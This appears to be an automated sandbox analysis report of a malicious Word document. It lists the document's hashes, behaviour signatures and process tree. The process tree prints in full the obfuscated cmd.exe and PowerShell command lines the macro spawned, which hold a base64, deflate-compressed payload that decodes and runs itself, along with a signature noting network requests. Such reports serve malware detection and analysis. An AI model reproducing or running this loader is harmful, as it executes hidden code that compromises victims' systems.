Analysis

  • max time kernel
    118s
  • max time network
    127s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230621-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2023 14:53

General

  • Target

    ACHFORMJLIL09212811597717.doc

  • Size

    232KB

  • MD5

    01e27446d5dccb690e518dd0d398294f

  • SHA1

    96cc081662e2d8502a56914a754f88a0257c9e00

  • SHA256

    03128d63886828689cca7198e5067843a68493d0c073bfcf22bac23b893afd85

  • SHA512

    97d6e6926604394bd7a8c013bf433b70567e7206af869dc9380ae5320cd567cd41eab87a9ea408fc0fcf1dcd14aa6db93cc8678af4cb2227fae56253f6d501f7

  • SSDEEP

    3072:DlFZ9MOFUca0DNB1Go08MOKXlxwJ1lPwW5RlMXvWoNwKRRWl81X9:RFzFUK6oHMxipwwKR4C3

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\ACHFORMJLIL09212811597717.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1616
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" NwRIFdz nrwDbYcdrCEZBUZYKl iEfrXNuwRbHwF & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %tiujXiwECZYbwOn%=wFASDPJ&&set %icRrjoizjHrhUL%=p&&set %LjcsnplQt%=o^w&&set %PAZGYQlHnRctCZa%=kZndGbZ&&set %qjQWNsAqEF%=!%icRrjoizjHrhUL%!&&set %QkiksJXNKdVffwY%=oRSlKVUlfWz&&set %LtoaKKIoihQapQ%=e^r&&set %iEzUoEDrudB%=!%LjcsnplQt%!&&set %wGUtjBKCjU%=s&&set %PtQmCnbIWpjszPD%=QhtuHMwzL&&set %jDrJtLXzVuu%=he&&set %ZwjsqdwkuM%=ll&&!%qjQWNsAqEF%!!%iEzUoEDrudB%!!%LtoaKKIoihQapQ%!!%wGUtjBKCjU%!!%jDrJtLXzVuu%!!%ZwjsqdwkuM%! " . ( ([STrING]$VeRbOsePreFErENCE)[1,3]+'X'-join'')(&('NE'+'W-ob'+'JE'+'ct') ('S'+'ySTem'+'.Io.CO'+'mPrE'+'SSi'+'o'+'N'+'.DeF'+'lAtEST'+'ReAM')([iO.memORYstream] [SystEM.conVert]::FrOMbaSE64sTRINg( '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' ) , [SySTem.io.coMpREssIon.cOmpreSSioNmOdE]::deCoMpRess ) | .('F'+'o'+'ReAch-ObJEcT'){&('NEW-ob'+'JE'+'ct') ('IO.StreA'+'mre'+'aDE'+'R')($_ ,[sysTEM.TEXt.encODing]::AscII) }|.('For'+'eAcH-oBje'+'ct') { $_.reADtoEnD( ) } )
      2⤵
      • Process spawned unexpected child process
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:2508
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell " . ( ([STrING]$VeRbOsePreFErENCE)[1,3]+'X'-join'')(&('NE'+'W-ob'+'JE'+'ct') ('S'+'ySTem'+'.Io.CO'+'mPrE'+'SSi'+'o'+'N'+'.DeF'+'lAtEST'+'ReAM')([iO.memORYstream] [SystEM.conVert]::FrOMbaSE64sTRINg( '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' ) , [SySTem.io.coMpREssIon.cOmpreSSioNmOdE]::deCoMpRess ) | .('F'+'o'+'ReAch-ObJEcT'){&('NEW-ob'+'JE'+'ct') ('IO.StreA'+'mre'+'aDE'+'R')($_ ,[sysTEM.TEXt.encODing]::AscII) }|.('For'+'eAcH-oBje'+'ct') { $_.reADtoEnD( ) } )
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:220

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_v0hmzcyj.gtr.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • memory/220-165-0x000001EEF4DF0000-0x000001EEF4E00000-memory.dmp

    Filesize

    64KB

  • memory/220-164-0x000001EEF4DF0000-0x000001EEF4E00000-memory.dmp

    Filesize

    64KB

  • memory/220-163-0x000001EEF4DF0000-0x000001EEF4E00000-memory.dmp

    Filesize

    64KB

  • memory/220-162-0x000001EEF4D70000-0x000001EEF4D92000-memory.dmp

    Filesize

    136KB

  • memory/1616-137-0x00007FF7F4EF0000-0x00007FF7F4F00000-memory.dmp

    Filesize

    64KB

  • memory/1616-139-0x00007FF7F2AB0000-0x00007FF7F2AC0000-memory.dmp

    Filesize

    64KB

  • memory/1616-138-0x00007FF7F2AB0000-0x00007FF7F2AC0000-memory.dmp

    Filesize

    64KB

  • memory/1616-133-0x00007FF7F4EF0000-0x00007FF7F4F00000-memory.dmp

    Filesize

    64KB

  • memory/1616-136-0x00007FF7F4EF0000-0x00007FF7F4F00000-memory.dmp

    Filesize

    64KB

  • memory/1616-134-0x00007FF7F4EF0000-0x00007FF7F4F00000-memory.dmp

    Filesize

    64KB

  • memory/1616-135-0x00007FF7F4EF0000-0x00007FF7F4F00000-memory.dmp

    Filesize

    64KB

  • memory/1616-189-0x00007FF7F4EF0000-0x00007FF7F4F00000-memory.dmp

    Filesize

    64KB

  • memory/1616-190-0x00007FF7F4EF0000-0x00007FF7F4F00000-memory.dmp

    Filesize

    64KB

  • memory/1616-191-0x00007FF7F4EF0000-0x00007FF7F4F00000-memory.dmp

    Filesize

    64KB

  • memory/1616-192-0x00007FF7F4EF0000-0x00007FF7F4F00000-memory.dmp

    Filesize

    64KB